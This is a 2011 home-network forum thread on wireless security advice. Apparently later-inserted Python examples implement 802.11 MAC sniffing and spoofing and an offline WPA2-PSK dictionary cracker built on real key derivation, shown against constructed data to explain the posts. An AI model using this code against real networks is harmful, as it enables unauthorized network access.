SageTV Community  

#1  01-31-2011, 01:09 PM
wrems (Sage Icon; Join Date: Feb 2007; Location: Marietta, GA; Posts: 1,332)
Securing a home wireless network

I realize there is an over-abundance of information regarding securing wireless networks to be found with a Google search. At the same time, I know many of you folks probably know as much as or more than some of the so-called experts.

So, what are the best practices when securing a home’s wireless network?

Any links to good sites or articles are appreciated. Any specific hardware recommendations are welcome too. Anything goes.

TIA
#2  01-31-2011, 01:30 PM
Taddeusz (SageTVaholic; Join Date: Nov 2004; Location: Yukon, OK; Posts: 3,919)
This is all my own opinion but I know there are sources that would back it up.

Basically use the best security you can. Meaning WPA or WPA2 (preferably WPA2). Do not use WEP if at all possible. If you have a device that won't do WPA or WPA2 consider replacing it or not using it.

MAC address filtering is worthless. With the proper hardware and software the MAC addresses on your network can be determined and then spoofed.

Hiding your SSID may stop the casual wannabe hacker, but it's not going to stop someone who really wants in. For guests and even some oddball devices it becomes more annoying than useful.

Can't really say I recommend any hardware specifically. I have a Dlink DIR-625 router that I really like. Other than that as long as your router supports WPA2 you're good to go.
__________________
Server: i5 8400, ASUS Prime H370M-Plus/CSM, 16GB RAM, 15TB drive array + 500GB cache, 2 HDHR's, SageTV 9, unRAID 6.6.3
Client 1: HD300 (latest FW), HDMI to an Insignia 65" 1080p LCD and optical SPDIF to a Sony Receiver
Client 2: HD200 (latest FW), HDMI to an Insignia NS-LCD42HD-09 1080p LCD
#3  01-31-2011, 02:07 PM
barney B.A. (Sage Advanced User; Join Date: May 2010; Location: South of Baltimore; Posts: 123)
Great advice. Use WPA/WPA2. By broadcasting your SSID and not using MAC address filtering, it becomes convenient to set up your network while still being very secure.
#4  01-31-2011, 02:30 PM
wrems (Sage Icon; Join Date: Feb 2007; Location: Marietta, GA; Posts: 1,332)
Would MAC address filtering in conjunction with WPA/WPA2 make one's network stronger? Or does it become moot if you're using one of the WPAs? I understand that MAC address filtering alone is quite useless.
#5  01-31-2011, 03:20 PM
GKusnick (SageTVaholic; Join Date: Dec 2005; Posts: 5,083)
The single most important security precaution is to use strong passwords and don't write them down. If you're the only user of this network, then there's no need to tell anyone your password ever. If you have other users, have them hand over their computers to you so you can type in the password. By far the most common cause of security breaches is passwords that are leaked or easily guessed.

With good password practices, WPA/WPA2 is more than adequate to secure your network. Adding MAC filtering might make you feel better but probably won't make any practical difference.
__________________
-- Greg
#6  01-31-2011, 03:50 PM
Spectrum (Sage Expert; Join Date: Aug 2006; Posts: 720)
Another thing that helps tremendously is having a guest network that only has internet access. My router has 2.4GHz and 5.0GHz radios, so I use the 5.0GHz and have the 2.4GHz network have internet-only access. I can give the password to friends/fam and the worst they can do is use bandwidth, assuming they aren't trying to be hackers. Even if that network gets compromised, my systems aren't at risk.
#7  01-31-2011, 03:51 PM
Taddeusz (SageTVaholic; Join Date: Nov 2004; Location: Yukon, OK; Posts: 3,919)
Plus, the MAC address is sent with no encryption. So using MAC filtering is really very useless. If someone really wanted to break into a network with MAC filtering it wouldn't be very difficult to monitor traffic and retrieve working MAC addresses.
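To make the point in posts #2 and #7 concrete, here is an added example (my own, not code from the thread or from any of the routers mentioned) that parses the 802.11 MAC header of data frames the way a passive sniffer does, and then forges a frame with a copied source address. The header is transmitted in the clear even when the body is WPA2-encrypted, so every station address is readable from a few seconds of traffic. The AP and client addresses and the frames themselves are constructed, not captured.

```python
import os
import struct

# Added example (not from the thread): parse the cleartext 802.11 MAC header of
# data frames to learn station addresses, then forge a frame a MAC allow-list
# accepts. All MAC addresses and frames below are constructed, not captured.

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))

def build_data_frame(addr1: bytes, addr2: bytes, addr3: bytes, *, to_ds: bool,
                     from_ds: bool, protected: bool = True, seq: int = 0,
                     payload: bytes = b"") -> bytes:
    """Plain (non-QoS) data frame: FC(2) duration(2) A1 A2 A3 seqctl(2) body."""
    fc0 = 0x08                                   # version 0, type 2 (data), subtype 0
    fc1 = (0x01 if to_ds else 0) | (0x02 if from_ds else 0) | (0x40 if protected else 0)
    seq_ctl = (seq << 4) & 0xFFFF                # fragment number 0
    return (bytes([fc0, fc1]) + struct.pack("<H", 0x002C) + addr1 + addr2 + addr3
            + struct.pack("<H", seq_ctl) + payload)

def parse_80211_header(frame: bytes) -> dict:
    """Type/flags plus BSSID and station address for infrastructure data frames."""
    fc0, fc1 = frame[0], frame[1]
    ftype = (fc0 >> 2) & 0x3
    to_ds, from_ds, protected = bool(fc1 & 0x01), bool(fc1 & 0x02), bool(fc1 & 0x40)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    bssid = station = None
    if ftype == 2:
        if to_ds and not from_ds:        # station -> AP: A1=BSSID, A2=SA (station), A3=DA
            bssid, station = a1, a2
        elif from_ds and not to_ds:      # AP -> station: A1=DA (station), A2=BSSID, A3=SA
            bssid, station = a2, a1
        # IBSS (0/0) and four-address WDS (1/1) frames are not handled here.
    return {"type": ftype, "to_ds": to_ds, "from_ds": from_ds, "protected": protected,
            "bssid": mac_str(bssid) if bssid else None,
            "station": mac_str(station) if station else None}

def stations_seen(frames, bssid: str) -> set:
    """What a passive sniffer learns: the header is never encrypted, even under WPA2."""
    seen = set()
    for f in frames:
        h = parse_80211_header(f)
        if h["type"] == 2 and h["bssid"] == bssid and h["station"]:
            seen.add(h["station"])
    return seen

def mac_filter_allows(frame: bytes, allowlist: set) -> bool:
    """The only check a router's MAC filter can make: is the claimed station address listed?"""
    return parse_80211_header(frame)["station"] in allowlist

def forge_uplink_frame(bssid: str, victim_station: str, payload: bytes) -> bytes:
    """Attacker-built frame: the source address is six bytes the sender chooses."""
    return build_data_frame(mac_bytes(bssid), mac_bytes(victim_station), mac_bytes(bssid),
                            to_ds=True, from_ds=False, payload=payload)

# Constructed capture: one AP, two legitimate clients, WPA2 (Protected bit set,
# bodies are random bytes standing in for CCMP ciphertext).
AP = "00:19:5b:11:22:33"
CLIENTS = ["00:1e:37:44:aa:bb", "d8:5d:4c:77:88:99"]
CAPTURE = [
    build_data_frame(mac_bytes(AP), mac_bytes(CLIENTS[0]), mac_bytes("ff:ff:ff:ff:ff:ff"),
                     to_ds=True, from_ds=False, seq=1, payload=os.urandom(64)),
    build_data_frame(mac_bytes(CLIENTS[1]), mac_bytes(AP), mac_bytes("00:19:5b:00:00:01"),
                     to_ds=False, from_ds=True, seq=2, payload=os.urandom(64)),
    build_data_frame(mac_bytes(AP), mac_bytes(CLIENTS[0]), mac_bytes("00:19:5b:00:00:01"),
                     to_ds=True, from_ds=False, seq=3, payload=os.urandom(64)),
]

if __name__ == "__main__":
    allow = stations_seen(CAPTURE, AP)            # the same list the router's filter holds
    print("stations learned from encrypted traffic:", sorted(allow))
    forged = forge_uplink_frame(AP, CLIENTS[1], b"attacker payload")
    print("forged frame passes the MAC filter:", mac_filter_allows(forged, allow))
```

The forged frame clears the filter, but with WPA2 the AP still discards its body because the attacker cannot produce valid CCMP ciphertext without the PSK. That is the whole story: the filter adds nothing the passphrase does not already provide, and a sniffer defeats it in the time it takes to see one frame.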
#8  01-31-2011, 04:59 PM
david1234 (Sage Aficionado; Join Date: Nov 2007; Location: Beaverton, OR; Posts: 313)
Quote (originally posted by Spectrum):
    Another thing that helps tremendously is having a guest network that only has internet access. My router has 2.4GHz and 5.0GHz radios, so I use the 5.0GHz and have the 2.4GHz network have internet-only access. I can give the password to friends/fam and the worst they can do is use bandwidth, assuming they aren't trying to be hackers. Even if that network gets compromised, my systems aren't at risk.
I have something similar, although it's a side effect of not wanting to mess around with the PPPoE settings on my router.

I have 2 wireless routers feeding my old non-wireless router (my gateway to the ISP).

One of the wireless routers is my internal network router, and the other is a guest-only router without access to my network.

Code:
          ISP
           |
        ROUTER----------------
           |                 |
       Wireless#1         Wireless#2
           |
     INTERNAL NETWORK
Wireless#2 is basically wide open, but it has no access to anything important.

I replaced Wireless#1 with a WRT54G from Buffalo (newegg had a good sale on the WHR-HP-GN) while I was off of work at Christmas time. I was planning to install the tomato firmware, but the interface that came with the router has been very good.
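Posts #6 and #8 both rely on the gateway actually refusing traffic from the guest side into the internal network. The following added example (mine, not from the thread and not any router's firmware) spells out the forwarding policy that has to hold and runs the checks a practitioner should make after setting it up: the guest subnet, the internal subnet, the gateway address and the ports are all assumptions chosen for illustration. It also shows the common mistake of putting the "allow internet" rule first.

```python
import ipaddress
from typing import List, NamedTuple, Optional, Set, Tuple

# Added example (not from the thread, not any router's firmware): the forward-chain
# policy a gateway needs so that a guest SSID reaches only the internet.
# Subnets, addresses and ports below are assumptions chosen for illustration.

class Flow(NamedTuple):
    src: str
    dst: str
    proto: str          # "tcp" or "udp"
    dport: int

class Rule(NamedTuple):
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    proto: str                  # "tcp", "udp" or "any"
    dports: Optional[Set[int]]  # None means any destination port
    action: str                 # "accept" or "drop"

net = ipaddress.ip_network
GUEST_NET = net("192.168.50.0/24")       # guest SSID (assumed)
GUEST_GATEWAY = net("192.168.50.1/32")   # the router's own address on the guest side
LAN_NET = net("192.168.1.0/24")          # SageTV server, extenders, NAS (assumed)
PRIVATE = [net("10.0.0.0/8"), net("172.16.0.0/12"), net("192.168.0.0/16")]
ANY = net("0.0.0.0/0")

# First match wins, so order matters: the two services a guest needs from the
# gateway are accepted before the drop that covers the gateway itself, and every
# private range is dropped before the catch-all accept that stands for the internet.
GUEST_RULES: List[Rule] = [
    Rule(GUEST_NET, GUEST_GATEWAY, "udp", {67, 53}, "accept"),   # DHCP and DNS
    Rule(GUEST_NET, GUEST_GATEWAY, "any", None, "drop"),         # admin UI, SSH, UPnP ...
] + [Rule(GUEST_NET, p, "any", None, "drop") for p in PRIVATE] + [
    Rule(GUEST_NET, ANY, "any", None, "accept"),                 # everything else
]

def evaluate(flow: Flow, rules: List[Rule] = GUEST_RULES, default: str = "drop") -> str:
    """First-match evaluation of a new connection coming from the guest network."""
    src, dst = ipaddress.ip_address(flow.src), ipaddress.ip_address(flow.dst)
    for r in rules:
        if (src in r.src and dst in r.dst and r.proto in ("any", flow.proto)
                and (r.dports is None or flow.dport in r.dports)):
            return r.action
    return default

def isolation_violations(rules: List[Rule] = GUEST_RULES) -> List[Tuple[Flow, str, str]]:
    """The checks to run after configuring a guest network: (flow, wanted, got)."""
    expectations = [
        (Flow("192.168.50.23", "93.184.216.34", "tcp", 443), "accept"),  # a web site
        (Flow("192.168.50.23", "192.168.50.1", "udp", 53), "accept"),    # DNS via gateway
        (Flow("192.168.50.23", "192.168.50.1", "udp", 67), "accept"),    # DHCP
        (Flow("192.168.50.23", "192.168.50.1", "tcp", 80), "drop"),      # router admin page
        (Flow("192.168.50.23", "192.168.1.10", "tcp", 445), "drop"),     # NAS file share
        (Flow("192.168.50.23", "192.168.1.20", "tcp", 8080), "drop"),    # an internal web UI
        (Flow("192.168.50.23", "10.0.0.5", "tcp", 22), "drop"),          # any other private net
    ]
    problems = []
    for flow, wanted in expectations:
        got = evaluate(flow, rules)
        if got != wanted:
            problems.append((flow, wanted, got))
    return problems

if __name__ == "__main__":
    print("violations with the correct order:", isolation_violations())
    # Common mistake: the "allow internet" rule placed first; the LAN is reachable again.
    wrong_order = [GUEST_RULES[-1]] + GUEST_RULES[:-1]
    print("violations with accept-first:", isolation_violations(wrong_order))
```

Two caveats the rules cannot cover: guest-to-guest traffic on the same SSID never passes the gateway, so that needs the AP's own client-isolation setting, and in the two-router layout from post #8 the rules belong on the upstream ROUTER facing Wireless#2, since Wireless#2 itself is the untrusted side.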
#9  01-31-2011, 05:04 PM
gibsonpa (Sage Advanced User; Join Date: Jan 2008; Location: STL, Mo; Posts: 202)
Quote (originally posted by Spectrum):
    Another thing that helps tremendously is having a guest network that only has internet access. My router has 2.4GHz and 5.0GHz radios, so I use the 5.0GHz and have the 2.4GHz network have internet-only access. I can give the password to friends/fam and the worst they can do is use bandwidth, assuming they aren't trying to be hackers. Even if that network gets compromised, my systems aren't at risk.
I have a Netgear WNDR3700 that has this guest feature...has worked very well.
#10  01-31-2011, 05:08 PM
wrems (Sage Icon; Join Date: Feb 2007; Location: Marietta, GA; Posts: 1,332)
Quote (originally posted by gibsonpa):
    I have a Netgear WNDR3700 that has this guest feature...has worked very well.
I've been eyeballing that router myself
#11  01-31-2011, 06:01 PM
blade (SageTVaholic; Join Date: Jan 2005; Posts: 2,500)
I agree with what everyone else has said. MAC filtering and hiding the SSID is a waste of time and just makes it more inconvenient for you. Never use WEP because it can be cracked in a matter of minutes. Unless I absolutely have to I'm not using anything less than WPA2. As was mentioned, having a very good password or pass phrase is a must. I think my pass phrase is around 27 characters long and includes numbers, letters and symbols. The phrase has a specific meaning to me so it's easy for me to remember, but isn't something that someone else is going to know.

Another thing to remember is that if someone can't get a signal they can't even begin to hack your network. Some routers and WAPs allow you to adjust the signal strength. Placing the router in a central location and reducing the signal strength as much as possible while still maintaining a good signal where you'll be using it is a good way to reduce the risk of being hacked.

If your router doesn't allow you to adjust the signal strength consider intentionally putting it somewhere to reduce the signal. For example my WAP is in my basement. I can still get good signal anywhere in my house and on my deck, but it does reduce the chance that a neighbor or someone sitting in a car down the street is going to be able to attempt a connection.

I've also considered setting up a second wireless AP that only has internet access for guests. I haven't done it yet because there are very few people that bring wireless devices into my home.

As for a good security site I ran across Wilders a few months ago and it has some good information.

I know this is more than just securing wireless, but I thought I'd share the changes I've made to my home network over the last few months. I recently started thinking more about security since it seems everyone I know ends up bringing me their computers because of viruses and such. I replaced my old router with Untangle (Unified Threat Management software). I run the Phish Block, Spy Ware Block, Virus Blocker, Intrusion Prevention, Firewall, Ad Blocker & Attack Blocker modules all of which are free.

I run XP Home so I set passwords for the Guest Accounts so that when I share a folder it at least requires a password to access them. I also finally got around to setting up passwords to the admin account that can only be accessed through safe mode.

I started using limited user accounts in XP with SuRun to make things more manageable. I now run my web browser using Sandboxie so anything I launch from the web browser is also launched in the sandbox.

I'm also using TrueCrypt. All of my private/personal files are stored in a TrueCrypt volume. I'm prompted for the password when I login and the volumes are auto-dismounted when I logout. I've tried to make it a habit of logging out of Windows when I'm finished. TrueCrypt is generally for providing physical protection of the files if a computer is stolen; however, I don't always mount the drives when I login to Windows. I usually just mount it when I need to access the files. So if I did get hacked or have a virus/trojan they wouldn't have access until I mounted the volume. Hopefully my anti-virus would have been updated and detected it by the time my private/personal files were mounted.

Lastly I have Acronis encrypt my backup files. I have no idea how secure its encryption really is, but I figure it's better than having my private/personal files sitting on a NAS unencrypted if everything else is locked down.
#12  01-31-2011, 06:57 PM
tmiranda (SageTVaholic; Join Date: Jul 2005; Location: Central Florida, USA; Posts: 5,851)
Quote (originally posted by wrems):
    I've been eyeballing that router myself
I just purchased one and am pleased with it. I still haven't figured out the whole "guest" thing yet so for now it's all locked down with WPA2.

The only thing that seemed insecure to me was that the setup screen used to enter the passphrase prints the characters rather than using asterisks ("*"). This means I need to make the router password at least as secure as the passphrase.
__________________

Sage Server: 8th gen Intel based system w/32GB RAM running Ubuntu Linux, HDHomeRun Prime with cable card for recording. Runs headless. Accessed via RD when necessary. Four HD-300 Extenders.

Last edited by tmiranda; 01-31-2011 at 07:07 PM.
#13  01-31-2011, 07:50 PM
Nelbert (Sage Advanced User; Join Date: Oct 2010; Posts: 163)
Use a password generator to create the passphrase; don't keep pressing generate until you get something you think is random, and use a long passphrase. People are rubbish at random and tend to choose random outcomes based on false logic.

Even with something as basic as random coin flip predictions for 100 flips, the imaginary flips vs the actual flips can be spotted without too much difficulty. Real world random is clumpy, imaginary random has things like "I've just had 3 tails, so the next one must be a head" in it and rejects clumpy.

Alternatively, if you don't want to use a random password generator md5sum a file that has random or changing contents in it, eg a swap file, even wiz.bin would do as it's specific to your machine.

Last November WPA-PSK was brute force dictionary cracked in ~20 mins for a few dollars using Amazon servers. Why? To show WPA-PSK isn't as secure as everyone claims: it isn't time consuming, doesn't require specialist hardware and isn't expensive to do. The current challenge is to reduce the time/cost even further.

The only consumer wireless encryption not broken is WPA-PSK2, so if you do use WPA-PSK don't use dictionary phrases if you're concerned about it being hi-jacked/abused.
#14  01-31-2011, 07:51 PM
david1234 (Sage Aficionado; Join Date: Nov 2007; Location: Beaverton, OR; Posts: 313)
Quote (originally posted by tmiranda):
    The only thing that seemed insecure to me was that the setup screen used to enter the passphrase prints the characters rather than using asterisks ("*"). This means I need to make the router password at least as secure as the passphrase.
I give bonus points to software that I can "unmask" the password. The more secure the passphrase, the more I need to see the field. Besides, how often is somebody really looking over my shoulder when I'm logging in?
#15  01-31-2011, 07:54 PM
Nelbert (Sage Advanced User; Join Date: Oct 2010; Posts: 163)
Quote (originally posted by tmiranda):
    I just purchased one and am pleased with it. I still haven't figured out the whole "guest" thing yet so for now it's all locked down with WPA2.

    The only thing that seemed insecure to me was that the setup screen used to enter the passphrase prints the characters rather than using asterisks ("*"). This means I need to make the router password at least as secure as the passphrase.
Not a bad thing, given the last wild virus/trojan (call it what you will) that attempted to hijack routers was launched from the user's PC using a simple password list. It was helped by the fact that so few people change the router password from its default.
#16  01-31-2011, 08:00 PM
GKusnick (SageTVaholic; Join Date: Dec 2005; Posts: 5,083)
Quote (originally posted by david1234):
    Besides, how often is somebody really looking over my shoulder when I'm logging in?
Don't forget the Van Eck phreak out in the parking lot reading the electromagnetic signal from your monitor.
__________________
-- Greg
#17  01-31-2011, 08:25 PM
QueOnda (Sage Icon; Join Date: Jan 2008; Posts: 1,093)
Quote (originally posted by GKusnick):
    Don't forget the Van Eck phreak out in the parking lot reading the electromagnetic signal from your monitor.
http://upe.acm.jhu.edu/websites/Jon_Grover/page2.htm

I don't think that works for LCD or plasma or DLP OR LCOS monitors. Does it? LOL
__________________
Server: HP AMD64 dual core running Win7 64bit (MCE disabled) with 4G memory Tuners: 2 PVR-500(disabled), 3 HDHR and 1 HDPVR Clients: 2 HD200 and 1 HD100 TV: 70" and 52" and 42" Media Storage: ReadyNas 8TB Recording media: 300GB + 200GB+ 250 GB Network: Gigabit backbone

Thanks to all the developers who work on SageMC, code, utilities and plug-ins to make SageTV better!!!
#18  01-31-2011, 11:53 PM
eric3a (Sage Advanced User; Join Date: Jul 2009; Location: Houston by the Sea; Posts: 226)
And then there's physical security: Live far enough away from anyone. You will probably notice the guy sitting in your backyard with a laptop trying to get in.
I don't have a large yard or house, but my wifi signal doesn't make it to public land. I've tried many times.
I guess maybe some antennas might be able to pick the signal up, but really I think someone would notice a dude sitting in front of my house aiming some weird antenna at it.
All my neighbors have guns, and most are redneck... Which is probably another way of securing our wifi systems from wandering geeks doing weird things in our small neighborhood?!!

I am assuming you live in higher density area where you don't know/trust your neighbors and potential visitors.
Eric
#19  02-01-2011, 12:05 AM
reggie14 (SageTVaholic; Join Date: Aug 2003; Location: Maryland; Posts: 2,760)
I'd just like to echo what everyone else said about using WPA/WPA2 with a strong password, and don't bother with MAC address filtering or hiding your SSID.

Ideally you'd use WPA2-AES-CCMP. But you might have some devices that can't use AES. It's not a big deal if you have to configure your router to allow both TKIP and AES. WPA2-TKIP is theoretically a little worse than WPA2-AES, but in practice the difference doesn't really matter from a security perspective.

The bigger problem is that you actually want to use the stronger WPA2-AES for performance reasons. The TKIP algorithm runs in software on the host CPU, whereas wireless routers have a crypto chip that handles AES encryption/decryption. The end result is that you'd probably need to use WPA2-AES to max a 802.11n connection. But, you should be safe running your wifi router in WPA2-TKIP+AES mode. Devices should default to using WPA2-AES-CCMP when possible.

You also don't need to go overboard on the passphrase. In my opinion, there's no good reason to use a randomly-generated 24+ character passphrase on a home network. Even against a dedicated attacker willing to use EC2, you're probably pretty safe with a ~10 character password with mixed-case letters and numerals. Just make sure you don't pick something that has any chance of being in a dictionary (don't use any words, or any variations of words, like replacing the letter 'I' with the number '1'). Yes, people are bad at coming up with truly random passphrases, but really you just need something that won't be in a dictionary.

I think Nelbert is exaggerating security problems in WPA. WPA-TKIP is still basically fine. The brute force attack on WPA-PSK wasn't quite as bad as it sounds. At least, the "attack" I know could brute force a 6-character single-case key in 6 minutes. By bumping that to a 10-character single-case key it takes 5 years. Use mixed-case and numbers and it takes 26984 years. Sure, an attacker could simply throw more EC2 VMs at cracking the key, but you get the picture. It's not trivial.
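Posts #13 and #19 are arguing about the same attack, so here is an added example (my own, not from either post and not any cracking tool's code) that reproduces it with the real WPA2-PSK key derivation: PBKDF2 turns the passphrase into the PMK, the 802.11i PRF turns the PMK into the PTK using the two MAC addresses and nonces from the 4-way handshake, and the first 128 bits of the PTK authenticate message 2. An attacker who captured one handshake can test guesses offline, which is why the cost is purely a function of the passphrase and the guess rate. The handshake values are constructed with a known passphrase, the wordlist is a constructed ten-entry list, and the guess rate used for the year figures is calibrated from the "6-character single-case key in 6 minutes" figure in the post above; it goes one step past the posts by showing the arithmetic for other lengths and alphabets.

```python
import hashlib
import hmac

# Added example (not from the thread): the offline guessing attack on WPA2-PSK,
# reproduced with real 802.11i key derivation, plus the keyspace arithmetic
# behind "years to exhaust" figures. The handshake is constructed, not captured.

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # These 4096 iterations are the only cost an offline guesser pays per guess.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf(key: bytes, label: bytes, data: bytes, nbits: int) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    for i in range((nbits + 159) // 160):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[: nbits // 8]

def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 384)   # 384-bit PTK for CCMP

def eapol_mic(kck: bytes, msg2_with_zeroed_mic: bytes) -> bytes:
    # WPA2-PSK: MIC = HMAC-SHA1(KCK, EAPOL-Key message 2 with the MIC field zeroed)[:16]
    return hmac.new(kck, msg2_with_zeroed_mic, hashlib.sha1).digest()[:16]

def mic_for_guess(guess: str, hs: dict) -> bytes:
    pmk = pmk_from_passphrase(guess, hs["ssid"])
    ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return eapol_mic(ptk[:16], hs["msg2"])       # KCK is the first 128 bits of the PTK

def crack_psk(hs: dict, wordlist):
    """Everything needed is in the captured handshake; no further contact with the AP."""
    for guess in wordlist:
        if mic_for_guess(guess, hs) == hs["mic"]:
            return guess
    return None

def make_handshake(passphrase: str) -> dict:
    """Constructed stand-in for a 4-way handshake capture (addresses and nonces arbitrary)."""
    hs = {
        "ssid": "HomeNet",
        "ap_mac": bytes.fromhex("00195b112233"),
        "sta_mac": bytes.fromhex("001e3744aabb"),
        "anonce": hashlib.sha256(b"constructed anonce").digest(),
        "snonce": hashlib.sha256(b"constructed snonce").digest(),
        # Abridged EAPOL-Key body for message 2; the 16-byte MIC field is zeroed.
        "msg2": bytes.fromhex("0103007502010a00") + bytes(16) + bytes(97),
    }
    hs["mic"] = mic_for_guess(passphrase, hs)     # what the real capture would contain
    return hs

def keyspace(alphabet_size: int, length: int) -> int:
    return alphabet_size ** length

def years_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    return keyspace(alphabet_size, length) / guesses_per_second / (365.25 * 86400)

# Guess rate calibrated from the post's figure: 26^6 lowercase keys in 6 minutes.
POSTED_RATE = keyspace(26, 6) / 360.0

WORDLIST = ["password", "letmein", "sunshine", "sunshine1", "Sunshine1", "qwerty123",
            "HomeNet", "homenet2011", "trustno1", "iloveyou"]   # constructed, tiny

if __name__ == "__main__":
    print("dictionary PSK recovered:", crack_psk(make_handshake("sunshine1"), WORDLIST))
    print("random PSK recovered:    ", crack_psk(make_handshake("kR7vQ2pLx9Wm"), WORDLIST))
    for length, alphabet in ((6, 26), (10, 26), (10, 62)):
        years = years_to_exhaust(alphabet, length, POSTED_RATE)
        print(f"{length} chars from {alphabet}: {years:.1f} years at the posted rate")
```

At the posted rate the 10-character lowercase key comes out at about 5.2 years and the mixed-case-plus-digits key at tens of thousands of years, which is the same order as the figures above; doubling the guess rate or adding machines only moves those numbers linearly, whereas one more character multiplies them by the alphabet size. A dictionary entry, however, is found after a handful of guesses no matter how long it is, which is the practical point both posts make.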
#20  02-01-2011, 01:00 AM
GKusnick (SageTVaholic; Join Date: Dec 2005; Posts: 5,083)
Quote (originally posted by reggie14):
    Yes, people are bad at coming up with truly random passphrases...
And even worse at remembering them. You want something you can remember without having to write it down.
__________________
-- Greg